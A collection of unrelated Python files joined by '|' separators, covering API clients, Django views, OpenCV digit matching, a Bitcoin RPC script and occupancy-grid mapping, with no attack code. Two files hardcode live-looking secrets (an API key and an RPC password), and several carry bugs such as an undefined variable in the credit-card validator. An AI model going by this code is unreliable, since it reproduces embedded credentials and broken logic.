return False
return sorted(a ** 2 for a in array1) == sorted(array2)
|
import wsdm.ts.helpers.persons.persons as p_lib
import definitions
import sys
import re
import numpy as np
import os
def find_similarity(person_name, term, inputType):
result={}
person_file = os.path.join(definitions.PERSONS_DIR, p_lib.remove_spaces(person_name) + ".txt")
if os.path.isfile(person_file):
with open(person_file, 'r', encoding='utf8') as f:
if inputType == definitions.TYPE_NATIONALITY:
result = get_person_nationalities(f)
elif inputType == definitions.TYPE_PROFESSION:
result = get_person_professions(f)
else:
raise TypeError
if (term in result.keys()):
return result[term]
return 0
def remove_quoted_words(text):
text=text.lower()
#quoted_word_pattern = re.compile(r"'([a-z]\w*)'")
result = re.findall(r"\".*?\"", text)
for word in result:
text=text.replace(word,'')
return text
def get_person_professions(file):
result={}
profession_majority = 7
file_content = file.read().lower()
file_content = remove_quoted_words(file_content)
profession_indexes = {}
with open(os.path.join(definitions.NOMENCLATURES_DIR, "professions.txt"), encoding='utf8', mode='r') as fr:
for profession_line in fr:
profession = profession_line.rstrip()
profession_lower = profession.lower()
profession_words = profession_lower.split(' ')
if profession_lower in file_content:
profession_indexes[profession] = file_content.index(profession_lower)
elif len(profession_words) > 1 and all(word in file_content for word in profession_words):
profession_indexes[profession] = np.mean([file_content.index(word) for word in profession_words])
for profession in sorted(profession_indexes, key=profession_indexes.get):
result[profession] = profession_majority
if profession_majority > 0:
profession_majority -= 1
if profession_majority <= 0:
break
return result
def get_person_nationalities(file):
result={}
nationality_majority = 7
from wsdm.ts.helpers.nationalities import nationalities
for line in file:
nationality_indexes = {}
for person, nationality in nationalities.nationalities_dict.items():
line = line.replace(person, nationality)
with open(os.path.join(definitions.NOMENCLATURES_DIR, "nationalities.txt"), encoding='utf8', mode='r') as fr:
for nationality_line in fr:
nationality = nationality_line.rstrip()
if nationality not in result:
if nationality in line:
nationality_indexes[nationality] = line.index(nationality)
if len(nationality_indexes) > 0:
for nationality in sorted(nationality_indexes, key=nationality_indexes.get):
result[nationality] = nationality_majority
if nationality_majority > 0:
nationality_majority-=1
if nationality_majority <= 0:
break
return result
def main(argv):
#f = codecs.open('D:/education/FMI_Sofia_University/III_sem/wsdm_2017/data/DATA_2016_10_15/persons/Richard_Séguin.txt', 'r', encoding='utf8')
#result = get_person_nationalities(f)
print(find_similarity('Richard Séguin', 'Germany', definitions.TYPE_NATIONALITY))
#f.close()
#print(result)
if __name__ == '__main__':
main(sys.argv[:]) |
"""Collection of DTOs and class for interacting with the service"""
import gzip
import http.client
import json
SERVER_URL = "devrecruitmentchallenge.com"
API_KEY = "59b505aa-1e62-4f4e-8b0b-16977331e485"
class ChallengeInfo(object):
"""Information regarding a challenge"""
def __init__(self, cid, challenge_type, name, description):
self.cid = cid
self.challenge_type = challenge_type.lower()
self.name = name
self.description = description
class Tweet(object):
"""A single tweet to be analysed"""
def __init__(self, tid, time, source, tweet):
self.tid = tid
self.time = time
self.source = source
self.tweet = tweet
class Challenge(object):
"""A Challenge definition"""
def __init__(self, info, tweets):
self.info = info
self.tweets = tweets
class ChallengeResult(object):
"""Response from a challenge submission"""
def __init__(self, submission_id, mark):
self.submission_id = submission_id
self.mark = mark
class Product(object):
"""A product definition"""
def __init__(self, name, product_type):
self.name = name
self.product_type = product_type
class Company(object):
"""A company definition"""
def __init__(self, name, ticker, products, industry):
self.name = name
self.ticker = ticker
self.products = [Product(p["name"], p["productType"]) for p in products]
self.industry = industry
def get_challenge_list():
"""Get the list of challenges"""
data = get_json("/api/challenges/")
return [ChallengeInfo(k["id"], k["challengeType"], k["name"], k["description"])
for k in data["challenges"]]
def get_challenge(cid):
"""Get the details of a specific challenge"""
data = get_json("/api/challenges/{}".format(cid))
info_json = data["challenge"]
info = ChallengeInfo(info_json["id"], info_json["challengeType"], ["name"],
info_json["description"])
tweets = [Tweet(k["id"], k["time"], k["source"], k["tweet"]) for k in data["tweets"]]
return Challenge(info, tweets)
def get_company_info():
"""Get details on all companies"""
data = get_json("/api/world/companies")
companies = [Company(k["name"], k["ticker"], k["products"], k["industry"]) for k in data["companies"]]
return companies
def get_positive_words():
"""Get a list of positive words"""
data = get_json("/api/words/positive")
return [x for x in data["words"]]
def get_neutral_words():
"""Get a list of neutral words"""
data = get_json("/api/words/neutral")
return [x for x in data["words"]]
def get_negative_words():
"""Get a list of negative words"""
data = get_json("/api/words/negative")
return [x for x in data["words"]]
def post_pertweet_submission(submission):
"""Post a per-tweet challenge submission and return the result"""
j = json.dumps(submission)
data = post_json("/api/submissions/pertweet", j)
return ChallengeResult(data["submissionId"], data["mark"])
def post_aggregated_submission(submission):
"""Post an aggregated challenge submission and return the result"""
j = json.dumps(submission)
data = post_json("/api/submissions/aggregated", j)
return ChallengeResult(data["submissionId"], data["mark"])
def get_json(url):
"""Return json result of GET"""
connection = http.client.HTTPConnection(SERVER_URL)
headers = {
"Authorization": "ApiKey {}".format(API_KEY),
"Accept-encoding": "gzip"
}
connection.request("GET", url, headers=headers)
response = connection.getresponse()
raw_content = response.read()
if response.getheader("Content-encoding") == "gzip":
content = gzip.decompress(raw_content).decode()
else:
content = raw_content.decode()
print("GET {} {} ({} bytes)".format(response.status, url, len(raw_content)))
#print(content)
if response.status != 200:
print(content)
raise ValueError("GET of {} was not successful".format(url))
return json.loads(content)
def post_json(url, j):
"""Return json result of a POST"""
connection = http.client.HTTPConnection(SERVER_URL)
headers = {"Authorization": "ApiKey {}".format(API_KEY), "Content-type": "application/json"}
connection.request("POST", url, j, headers=headers)
response = connection.getresponse()
content = response.read().decode()
print("POST {} {} ({} bytes)".format(response.status, url, len(content)))
#print(content)
if response.status != 200:
print(content)
raise ValueError("POST to {} was not successful. Sent JSON '{}'".format(url, j))
return json.loads(content)
|
import googlemaps
import logging
import json
from time import sleep
class LookupHotelInviumPlaces(object):
def __init__(self, **kwargs):
self.logger = logging.getLogger('HotelRefugus')
self.client = None
def initialise_places(self, api_key):
"""
Initialise API Session with api key
:param api_key: str
"""
self.client = googlemaps.Client(key=api_key)
def lookup_hotels(self, address, area, language='en'):
"""
Query Google Places API to obtain list of hotels within area
of requested address in requested language (default english)
:param address: str
:param area: str
:param language: str
:return (dict): results array from API https://developers.google.com/places/web-service/search#nearby-search-and-text-search-responses
"""
self.logger.info('Looking up Hotels')
self.logger.debug(f'Address: {address}\nArea: {area}\nLanguage: {language}')
coordinates = self.get_gps_coordinates(address)
self.logger.debug(coordinates)
response = self.client.places_nearby(location=coordinates, keyword='hotel',
type='lodging', radius=area)
if response.get('next_page_token') is not None:
self.logger.debug('More than 20 results found, paging Dr. Token')
results = response['results']
page_token = response['next_page_token']
while page_token is not None:
try:
response = self.client.places_nearby(page_token=page_token)
# Requesting page before it's available will trigger this exception so we wait
except googlemaps.exceptions.ApiError as e:
self.logger.debug(e)
self.logger.warning('Token is not ready, waiting 2 seconds')
sleep(2)
response = self.client.places_nearby(page_token=page_token)
results += response['results']
page_token = response.get('next_page_token')
return results
else:
self.logger.debug(json.dumps(response['results']))
return response['results']
def get_gps_coordinates(self, address):
"""
Convert Postal address into GPS Coordinates
:param address: str
:return: str latitude, longitude
"""
response = self.client.geocode(address)
return '{0},{1}'.format(response[0]['geometry']['location']['lat'],
response[0]['geometry']['location']['lng'])
|
# -*- coding: utf-8 -*-
import string
class Solution:
def titleToNumber(self, s):
result = 0
for c in s:
result *= 26
result += string.ascii_uppercase.index(c) + 1
return result
if __name__ == "__main__":
solution = Solution()
assert 1 == solution.titleToNumber("A")
assert 28 == solution.titleToNumber("AB")
assert 701 == solution.titleToNumber("ZY")
|
num = float(input('Enter a number: '))
numsq = num ** 0.5
print(numsq)
|
from django.shortcuts import render, redirect, reverse
# Create your views here.
def index(request, schmoo):
print id
return render(request, 'app2/index.html')
def post_test(request):
print "here"
return redirect(reverse('app1:index'))
|
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import absolute_import, division, print_function, unicode_literals
import pymysql.cursors
class MySQLUtil:
def __init__(self, host="", port=0, user="", password=""):
if host and port and user and password:
self.db_host = host
self.db_port = int(port)
self.db_user = user
self.db_password = password
else:
raise ValueError("Wrong input parameters")
def create_connection(self):
connection = pymysql.connect(
host=self.db_host,
port=self.db_port,
user=self.db_user,
password=self.db_password,
cursorclass=pymysql.cursors.DictCursor,
)
return connection
def try_connect(self):
connection = self.create_connection()
connection.close()
def get_mysql_version(self):
connection = self.create_connection()
with connection:
cursor = connection.cursor()
cursor.execute("SELECT version()")
result = cursor.fetchone()
return result["version()"]
def user_has_privileges(self, user, privileges):
connection = self.create_connection()
with connection:
cursor = connection.cursor()
sql = "SELECT {} FROM mysql.user WHERE user=%s".format(",".join(privileges))
cursor.execute(sql, (user,))
result = cursor.fetchone()
return result
|
import cv2
import numpy as np
def calHuMoments(src, logHuMoments, num):
img = cv2.imread(src)
# Convert to grayscale and apply Gaussian filtering
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
hsv = cv2.GaussianBlur(hsv, (5, 5), 0)
# Threshold the image
MIN= np.array([0,0,0],np.uint8)
MAX= np.array([355,55,100],np.uint8)
mask = cv2.inRange(hsv, MIN,MAX)
# ret,im_th = cv2.threshold(mask,160,255,cv2.THRESH_BINARY_INV)
# Find contours in the image
# ctrs, hier = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
#cv2.drawContours(img, ctrs,35, (255,100,0), 2)
# print len(ctrs)
moments=cv2.HuMoments(cv2.moments(mask)).flatten()
# print "Original hu moments are ",moments
mean=(moments[0]+moments[1]+moments[2]+moments[3]+moments[4]+moments[5]+moments[6])/7
# print mean
a1=(moments[0]-mean)
a11=pow(a1,2)
a2=(moments[1]-mean)
a22=pow(a2,2)
a3=(moments[2]-mean)
a33=pow(a3,2)
a4=(moments[3]-mean)
a44=pow(a4,2)
a5=(moments[4]-mean)
a55=pow(a5,2)
a6=(moments[5]-mean)
a66=pow(a6,2)
a7=(moments[6]-mean)
a77=pow(a7,2)
deviation=np.sqrt(a11+a22+a33+a44+a55+a66+a77)
a1=a1/deviation
a2=a2/deviation
a3=a3/deviation
a4=a4/deviation
a5=a5/deviation
a6=a6/deviation
a7=a7/deviation
# nom2Moments={a1,a2,a3,a4,a5,a6,a7}
# print "Normalised Hu Moments are", nomMoments
a1=a1*np.log(abs(a1))/abs(a1)
a2=a2*np.log(abs(a2))/abs(a2)
a3=a3*np.log(abs(a3))/abs(a3)
a4=a4*np.log(abs(a4))/abs(a4)
a5=a5*np.log(abs(a5))/abs(a5)
a6=a6*np.log(abs(a6))/abs(a6)
a7=a7*np.log(abs(a7))/abs(a7)
D=abs(a1-logHuMoments[0])+abs(a2-logHuMoments[1])+abs(a3-logHuMoments[2])+abs(a4-logHuMoments[3])+abs(a5-logHuMoments[4])+abs(a6-logHuMoments[5])+abs(a7-logHuMoments[6])
print D
# blue=np.uint8([[[0,0,0]]])
# hsv_blue=cv2.cvtColor(blue, cv2.COLOR_BGR2HSV)
# print hsv_blue
# cv2.imshow('contours',mask)
# cv2.imshow('original',img)
image='digits/4.jpg'
img = cv2.imread(image)
# Convert to grayscale and apply Gaussian filtering
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
hsv = cv2.GaussianBlur(hsv, (5, 5), 0)
# Threshold the image
MIN= np.array([0,0,0],np.uint8)
MAX= np.array([355,55,100],np.uint8)
mask = cv2.inRange(hsv, MIN,MAX)
cv2.imwrite("444.jpg",mask)
# ret,im_th = cv2.threshold(mask,160,255,cv2.THRESH_BINARY_INV)
# Find contours in the image
# ctrs, hier = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
#cv2.drawContours(img, ctrs,35, (255,100,0), 2)
# print len(ctrs)
moments=cv2.HuMoments(cv2.moments(mask)).flatten()
# print "Original hu moments are ",moments
mean=(moments[0]+moments[1]+moments[2]+moments[3]+moments[4]+moments[5]+moments[6])/7
# print mean
a1=(moments[0]-mean)
a11=pow(a1,2)
a2=(moments[1]-mean)
a22=pow(a2,2)
a3=(moments[2]-mean)
a33=pow(a3,2)
a4=(moments[3]-mean)
a44=pow(a4,2)
a5=(moments[4]-mean)
a55=pow(a5,2)
a6=(moments[5]-mean)
a66=pow(a6,2)
a7=(moments[6]-mean)
a77=pow(a7,2)
deviation=np.sqrt(a11+a22+a33+a44+a55+a66+a77)
a1=a1/deviation
a2=a2/deviation
a3=a3/deviation
a4=a4/deviation
a5=a5/deviation
a6=a6/deviation
a7=a7/deviation
nomMoments=[a1,a2,a3,a4,a5,a6,a7]
# print "Normalised Hu Moments are", nomMoments
a1=a1*np.log(abs(a1))/abs(a1)
a2=a2*np.log(abs(a2))/abs(a2)
a3=a3*np.log(abs(a3))/abs(a3)
a4=a4*np.log(abs(a4))/abs(a4)
a5=a5*np.log(abs(a5))/abs(a5)
a6=a6*np.log(abs(a6))/abs(a6)
a7=a7*np.log(abs(a7))/abs(a7)
logMoments=[a1,a2,a3,a4,a5,a6,a7]
print "Digit >> 1"
for i in range(0,10):
image="digits/"+str(i)+".jpg"
calHuMoments(image,logMoments, i)
cv2.waitKey() |
'''
Overrides nothing.
'''
|
from django.db import models
from django.contrib.auth.models import User
from calendar import timegm as epoch
from api_boilerplate.models import ApiKey
class UserProfile(models.Model):
user = models.OneToOneField(User, related_name='profile')
def __unicode__(self):
return u'%s' % (self.user.username)
def get_api_key(self):
api_key, created = ApiKey.objects.get_or_create(user=self.user)
return api_key.key
def api(self, include_account=False):
user = self.user
data = {
'username': user.username,
'is_admin': user.is_staff,
'joined_at': epoch(user.date_joined.timetuple()),
'resource_uri': '/api/users/%s/' % user.pk,
}
# Return API key when account info is requested
if include_account:
data['api_key'] = self.get_api_key()
return data
User.profile = property(lambda u: UserProfile.objects.get_or_create(user=u)[0]) |
import re
def check_credit_number_for_validating(string1):
string2= ''.join(string1.split('-'))
checking=True
for i in range(len(string2)-3):
if string2[i] == string2[i+1] and string2[i] == string2[i+2] and string2[i] == string2[i+3]:
checking=False
return checking
for i in range(int(input())):
credit_number = input()
if (re.compile('^[4-6][0-9]{15}$').match(s) or re.compile('^[4-6][0-9]{3}(-[0-9]{4}){3}$').match(credit_number)) and check_credit_number_for_validating(credit_number):
print("Valid")
else:
print("Invalid") |
"""
Colour definitions used by the somewhere over the rainbow activity.
"""
# Define the colour boundaries in HSV
LOWER_RED_LFT_HSV = [165, 50, 50] # Left of 0deg Red = ~330deg to 359deg
UPPER_RED_LFT_HSV = [179, 255, 255] # Red
LOWER_RED_HSV = [0, 50, 50] # Red = 0deg to ~30deg
UPPER_RED_HSV = [15, 255, 255] # Red
LOWER_BLUE_HSV = [80, 50, 50] # Blue = ~180deg to ~260deg
UPPER_BLUE_HSV = [140, 255, 255] # Blue
LOWER_GREEN_HSV = [45, 50, 50] # Green = ~90deg to ~150deg
UPPER_GREEN_HSV = [75, 255, 255] # Green
LOWER_YELLOW_HSV = [15, 50, 50] # Yellow = ~30deg to ~90deg
UPPER_YELLOW_HSV = [45, 255, 255] # Yellow
LOWER_HSV_ARRAY = [
LOWER_RED_HSV, LOWER_BLUE_HSV, LOWER_GREEN_HSV, LOWER_YELLOW_HSV
]
UPPER_HSV_ARRAY = [
UPPER_RED_HSV, UPPER_BLUE_HSV, UPPER_GREEN_HSV, UPPER_YELLOW_HSV
]
# Define the colour boundaries in YUV
LOWER_RED_YUV = [30, 100, 133] # Red
UPPER_RED_YUV = [255, 127, 255] # Red
LOWER_BLUE_YUV = [36, 122, 49] # Blue
UPPER_BLUE_YUV = [255, 255, 123] # Blue
LOWER_GREEN_YUV = [31, 108, 0] # Green
UPPER_GREEN_YUV = [255, 132, 123] # Green
LOWER_YELLOW_YUV = [57, 0, 117] # Yellow
UPPER_YELLOW_YUV = [255, 132, 185] # Yellow
LOWER_YUV_ARRAY = [
LOWER_RED_YUV, LOWER_BLUE_YUV, LOWER_GREEN_YUV, LOWER_YELLOW_YUV
]
UPPER_YUV_ARRAY = [
UPPER_RED_YUV, UPPER_BLUE_YUV, UPPER_GREEN_YUV, UPPER_YELLOW_YUV
]
# Initialize colour array counter
COLOUR_NAME_ARRAY = ['Red', 'Blue', 'Green', 'Yellow']
|
from bitcoinrpc.authproxy import AuthServiceProxy, JSONRPCException
rpc_user = "bitcoin_orpheus"
rpc_password = "EwJeV3LZTyTVozdECF027BkBMnNDwQaVfakG3A4wXYyk"
rpcserver_host = "localhost"
rpcserver_port = 18332
rpc = AuthServiceProxy("http://%s:%s@%s:%s"
% (rpc_user, rpc_password, rpcserver_host, rpcserver_port))
print(rpc.getblockcount())
first_unspent = rpc.listunspent()[0]
print first_unspent
print first_unspent['txid']
outpoints = [
{
'txid' : first_unspent['txid'],
'vout' : first_unspent['vout']
}
]
outputs = {
rpc.getnewaddress() : 10
}
raw_transaction = rpc.createrawtransaction(outpoints, outputs)
new_transaction = rpc.decoderawtransaction(raw_transaction)
import pprint
pp = pprint.PrettyPrinter(indent=1)
pp.pprint(new_transaction)
# new_address =
# print(new_address)
# rpc.sendtoaddress(new_address,10) |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
last mod 7/1/19
using opencv's warpAffine instead of handmade grid conversions
"""
import numpy as np
from cv2 import warpAffine, BORDER_TRANSPARENT, BORDER_CONSTANT
from cv2 import INTER_LINEAR, INTER_CUBIC, WARP_INVERSE_MAP
tile_size = .5
tile_start = (-10., -50.)
occupancygrid_shape = (140, 200)
ntx, nty = occupancygrid_shape
grid = np.mgrid[:ntx, :nty]
grid = grid.transpose((1,2,0)).astype(float)
#grid += .5
grid *= tile_size
grid += tile_start
def updateGridwGrid(priorgrid, msmtgrid, viewedgrid, msmt_confusion_matrix):
"""
given an occupancy prior and measured occupancy, update posterior of occupancy
prior and posterior are float matrices
msmtgrid and viewedgrid are boolean matrices
if there is a msmt in the grid, it is a positive measurement
if there is no msmt and the tile was viewed, it is a negative measurement
if the tile is not viewed it is not updated
P(x=1|z=1) = P(x=1)P(z=1|x=1)/(P(x=1)P(z=1|x=1) + (1-P(x=1))P(z=1|x=0))
"""
tnp,fpp = msmt_confusion_matrix[0]
fnp,tpp = msmt_confusion_matrix[1]
posterior_seen = priorgrid*tpp/(fpp + priorgrid*(tpp-fpp))
posterior_notseen = priorgrid*fnp/(tnp + priorgrid*(fnp-tnp))
posterior = priorgrid.copy()
posterior[msmtgrid] = posterior_seen[msmtgrid]
notseen = (msmtgrid==False) & viewedgrid
posterior[notseen] = posterior_notseen[notseen]
return posterior
#
#def reOrientGridOlder(priorgrid, transform, initial_val, gridstep, gridstart, gridlen):
# """
# transform = [[cos,-sin,tx],[sin,cos,ty],[0,0,1]]
# shift an occupancy grid
# Obviously, there is error due to imperfect matching of old and new tiles.
# This function does an approximation by finding the old tiles corresponding to
# the bottom left and top right corners of the new tile. The returned occupancy
# is a weighted sum of the two. Tiles that were previously out of frame are
# set to the initial value.
# """
# grid = np.mgrid[gridstart[0]:gridstart[0]+gridlen[0],
# gridstart[1]:gridstart[1]+gridlen[1]]
# grid = grid.transpose((1,2,0)) * gridstep
# tile_distance_limit = gridstep[0]*2**.5 + .01
# newgrid_pos = (grid - transform[:2,2]).dot(transform[:2,:2])
# newgrid_idxs = np.floor(newgrid_pos/gridstep).astype(int) - gridstart
# newgrid_bl_xidx = newgrid_idxs[:,:,0]
# newgrid_bl_yidx = newgrid_idxs[:,:,1]
# newgrid_outofzone = newgrid_bl_xidx >= gridlen[0]
# newgrid_outofzone |= newgrid_bl_yidx >= gridlen[1]
# newgrid_outofzone |= newgrid_bl_xidx < 0
# newgrid_outofzone |= newgrid_bl_yidx < 0
# newgrid_idxs[newgrid_outofzone] = 0
# newgrid_diff = newgrid_pos - grid[newgrid_bl_xidx,newgrid_bl_yidx]
# newgrid_bl_score = tile_distance_limit - np.hypot(newgrid_diff[:,:,0],
# newgrid_diff[:,:,1])
# newgrid_bl_score[newgrid_outofzone] = 0
# assert np.all(newgrid_bl_score >= 0)
#
# newgrid_pos = (grid + gridstep - transform[:2,2]).dot(transform[:2,:2])
# newgrid_idxs = np.floor(newgrid_pos/gridstep).astype(int) - gridstart
# newgrid_tr_xidx = newgrid_idxs[:,:,0]
# newgrid_tr_yidx = newgrid_idxs[:,:,1]
# newgrid_outofzone = newgrid_tr_xidx >= gridlen[0]
# newgrid_outofzone |= newgrid_tr_yidx >= gridlen[1]
# newgrid_outofzone |= newgrid_tr_xidx < 0
# newgrid_outofzone |= newgrid_tr_yidx < 0
# newgrid_idxs[newgrid_outofzone] = 0
# newgrid_diff = grid[newgrid_tr_xidx,newgrid_tr_yidx]+gridstep - newgrid_pos
# newgrid_tr_score = tile_distance_limit - np.hypot(newgrid_diff[:,:,0],
# newgrid_diff[:,:,1])
# newgrid_tr_score[newgrid_outofzone] = 0
# assert np.all(newgrid_tr_score >= 0)
#
# newgrid = newgrid_bl_score * priorgrid[newgrid_bl_xidx, newgrid_bl_yidx]
# newgrid += newgrid_tr_score * priorgrid[newgrid_tr_xidx, newgrid_tr_yidx]
# newgrid += initial_val * .001
# newgrid_count = newgrid_bl_score + newgrid_tr_score + .001
# newgrid /= newgrid_count
# return newgrid
def reOrientGridOld(priorgrid, transform, initial_val, gridstep, gridstart, gridlen):
"""
transform = [[cos,-sin,tx],[sin,cos,ty],[0,0,1]]
shift an occupancy grid
Obviously, there is error due to imperfect matching of old and new tiles.
This function does an approximation by finding the old tiles corresponding to
points evenly spaced within the tile
"""
r = 4
grid = np.mgrid[gridstart[0]:gridstart[0]+gridlen[0],
gridstart[1]:gridstart[1]+gridlen[1]]
grid = grid.transpose((1,2,0)) * gridstep
jumps = np.mgrid[:r,:r].transpose((1,2,0)).reshape((r**2,2))
jumps = (jumps + .5)*(gridstep/r)
newgrid = np.zeros(gridlen)
for jump in jumps:
newgrid_pos = (grid + jump - transform[:2,2]).dot(transform[:2,:2])
newgrid_idxs = np.floor(newgrid_pos/gridstep).astype(int) - gridstart
newgrid_xidx = newgrid_idxs[:,:,0]
newgrid_yidx = newgrid_idxs[:,:,1]
newgrid_inzone = ((newgrid_xidx < gridlen[0]) &
(newgrid_yidx < gridlen[1]) &
(newgrid_xidx >= 0) &
(newgrid_yidx >= 0))
newgrid_idxs[newgrid_inzone==False] = 0 # doesn't matter, just avoids IndexError
newgrid += np.where(newgrid_inzone, priorgrid[newgrid_xidx, newgrid_yidx],
initial_val)
newgrid /= r**2
return newgrid
def reOrientGrid(priorgrid, transform, initial_val, gridstep, gridstart, gridlen):
"""
transform = [[cos,-sin,tx],[sin,cos,ty],[0,0,1]]
shift an occupancy grid
Obviously, there is error due to imperfect matching of old and new tiles.
This function does an approximation by finding the old tiles corresponding to
points evenly spaced within the tile
"""
movex = -gridstart[0]+transform[0,2]/gridstep[0]
movex += transform[0,1]*gridstart[1] + transform[0,0]*gridstart[0]
movey = -gridstart[1]+transform[1,2]/gridstep[1]
movey += transform[1,1]*gridstart[1] + transform[1,0]*gridstart[0]
T = np.array([[transform[1,1],transform[1,0],movey],
[transform[0,1],transform[0,0],movex]])
return warpAffine(priorgrid, T, (gridlen[1],gridlen[0]),
flags=INTER_LINEAR,#+WARP_INVERSE_MAP,
borderMode=BORDER_CONSTANT, borderValue=initial_val)
#from groundRat import getElevation
import numba as nb
@nb.jit(nb.void(nb.b1[:,:], nb.f8, nb.f8, nb.f8, nb.f8, nb.f8, nb.f8))
def fillTriangle(canvas, ax, ay, bx, by, cx, cy):
"""
helper for gridViewable
based on
http://www-users.mat.uni.torun.pl/~wrona/3d_tutor/tri_fillers.html
assumes a->b->c is ccw, ax<bx, ax<cx
"""
dxb = (by-ay)/(bx-ax)
dxc = (cy-ay)/(cx-ax)
if cx > bx + 1:
secondx = int(bx)
thirdx = int(cx)
dxb2 = (cy-by)/(cx-bx)
dxc2 = dxc
elif bx > cx + 1:
secondx = int(cx)
thirdx = int(bx)
dxb2 = dxb
dxc2 = (by-cy)/(bx-cx)
else:
secondx = int(bx)
thirdx = secondx
dxb2 = 0.
dxc2 = 0.
syb = ay
syc = ay
for sx in range(int(ax), secondx):
syb += dxb
syc += dxc
canvas[sx, int(syb):int(syc)] = True
for sx in range(secondx, thirdx):
syb += dxb2
syc += dxc2
canvas[sx, int(syb):int(syc)] = True
extradist = 1.
def gridViewable(occlusion_maps, occlusion_info, ground):
"""
go faster -> triangle filling
"""
gridcenters = grid + tile_size/2.
dists = np.hypot(gridcenters[:,:,1], gridcenters[:,:,0])
heights = ground[:,:,3]-ground[:,:,0]*gridcenters[:,:,0]-ground[:,:,1]*gridcenters[:,:,1]
#heights = getElevation(gridcenters, ground)
effective_min_angle = (0-1.65+heights)/dists
effective_max_angle = (2-1.65+heights)/dists
origin_x = np.searchsorted(gridcenters[:,0,0], 0)
origin_y = np.searchsorted(gridcenters[0,:,1], 0)
max_x = tile_start[0]+tile_size*ntx
max_y = tile_start[1]+tile_size*nty
viewed = np.zeros(occupancygrid_shape, dtype=bool)
occlusion_startidx = 0
for occlusion_endidx, laser_angle in occlusion_info:
occlusion_endidx = int(occlusion_endidx)
if occlusion_startidx == occlusion_endidx:
continue
included = effective_min_angle < laser_angle
included &= effective_max_angle > laser_angle
inzone = np.zeros(occupancygrid_shape, dtype=bool)
starting_angle = occlusion_maps[occlusion_startidx,0]
starting_dist = occlusion_maps[occlusion_startidx,2]
for ending_angle,ending_dist,nextdist in\
occlusion_maps[occlusion_startidx+1:occlusion_endidx]:
if starting_dist > 2:
c = np.cos(starting_angle)
s = np.sin(starting_angle)
dist = starting_dist + extradist
if dist*c > max_x:
dist = max_x/c
if dist*s > max_y:
dist = max_y/s
if dist*s < tile_start[1]:
dist = tile_start[1]/s
starting_x = (c*dist - tile_start[0]) / tile_size
starting_y = (s*dist - tile_start[1]) / tile_size
c = np.cos(ending_angle)
s = np.sin(ending_angle)
dist = ending_dist + extradist
if dist*c > max_x:
dist = max_x/c
if dist*s > max_y:
dist = max_y/s
if dist*s < tile_start[1]:
dist = tile_start[1]/s
ending_x = (c*dist - tile_start[0]) / tile_size
ending_y = (s*dist - tile_start[1]) / tile_size
fillTriangle(inzone, origin_x, origin_y,
starting_x, starting_y, ending_x, ending_y)
starting_dist = nextdist
starting_angle = ending_angle
viewed |= included & inzone
occlusion_startidx = occlusion_endidx
return viewed
def mixGrid(grid, mixer, outervalue, tempmat=None):
"""
perform 2d convolution on a grid to emulate propagation between adjacent tiles
tiles outside the limit of the grid are set to outervalue
"""
assert mixer.shape[0]%2 and mixer.shape[1]%2
pad = np.array(mixer.shape)//2
if tempmat is None:
tempmat = np.zeros(grid.shape+pad*2, dtype=grid.dtype)
else:
assert all(pad*2+grid.shape == tempmat.shape)
tempmat[pad[0]:-pad[0], pad[1]:-pad[1]] = grid
tempmat[:pad[0],:] = outervalue
tempmat[-pad[0]:,:] = outervalue
tempmat[:,:pad[1]] = outervalue
tempmat[:,-pad[1]:] = outervalue
viewshape = (grid.shape[0], grid.shape[1], mixer.shape[0], mixer.shape[1])
view4conv = np.lib.stride_tricks.as_strided(tempmat, viewshape,
tempmat.strides*2, writeable=False)
grid[:] = np.einsum(view4conv, [0,1,2,3], mixer, [2,3], [0,1])
""" useful polynomial approximation of normal cdf
source = John D Cooke blog """
def approxNormalCdf(dev): return 1./(1 + np.exp(-.07056 * dev**3 - 1.5976 * dev))
def eigTwoxTwo(varx, vary, covxy):
# from math.harvard.edu/archive/21b_fall_04/exhibits/2dmatrices/
T = (varx+vary)*.5
D = varx*vary-covxy*covxy
eigval1 = T + np.sqrt(T*T-D)
eigval2 = 2*T - eigval1
eigvecnorm = np.hypot(eigval1-vary, covxy)
return eigval1, eigval2, (eigval1-vary)/eigvecnorm, covxy/eigvecnorm
""" this is an approximate cdf, assuming independent prob in x and y directions
"""
def mapNormal2Grid(meanx, meany, varx, vary, covxy,
gridstart, gridstep, gridlen):
xposs = np.arange(gridstart[0], gridstart[0]+gridlen[0]+1) * gridstep[0]
cdf = approxNormalCdf((xposs-meanx) / varx**.5)
totalprobinside = cdf[-1] - cdf[0]
if totalprobinside < 1e-10:
# very low likelihood of appearance, just set to uniform
return np.zeros(gridlen) + 1./gridlen[0]/gridlen[1]
llx = np.diff(cdf) / totalprobinside
yposs = np.arange(gridstart[1], gridstart[1]+gridlen[1]+1) * gridstep[1]
cdf = approxNormalCdf((yposs-meany) / vary**.5)
totalprobinside = cdf[-1] - cdf[0]
if totalprobinside < 1e-10:
return np.zeros(gridlen) + 1./gridlen[0]/gridlen[1]
lly = np.diff(cdf) / totalprobinside
return np.outer(llx, lly)
""" approximate cdf, accounting for xy correlation
make normal cdf grid, do rotation transform to put on rectified grid
don't do scale transform, b.c. you would need to sum probs for increased scale
note: cv2 transformation matrices have y-axis first
"""
def mapNormal2GridRot(meanx, meany, varx, vary, covxy,
gridstart, gridstep, gridlen):
rectvx, rectvy, rectc, rects = eigTwoxTwo(varx, vary, covxy)
gridcenter = (gridstart + gridlen*.5)*gridstep
rotmeanx = rectc*(meanx-gridcenter[0]) + rects*(meany-gridcenter[1]) + gridcenter[0]
rotmeany = rectc*(meany-gridcenter[1]) - rects*(meanx-gridcenter[0]) + gridcenter[1]
ingrid = mapNormal2Grid(rotmeanx, rotmeany, rectvx, rectvy,
0, gridstart, gridstep, gridlen)
midx, midy = gridlen*.5 - .5
T = np.array(((rectc, rects, midy-rectc*midy-rects*midx),
(-rects, rectc, midx-rectc*midx+rects*midy)))
outgrid = warpAffine(ingrid, T, (gridlen[1], gridlen[0]),
flags=INTER_LINEAR,
borderMode=BORDER_CONSTANT, borderValue=0.)
# bilinear interpolation may alter the sum of values
# problem for probability distributions
if np.sum(outgrid) > 1: outgrid /= np.sum(outgrid)
return outgrid
"""
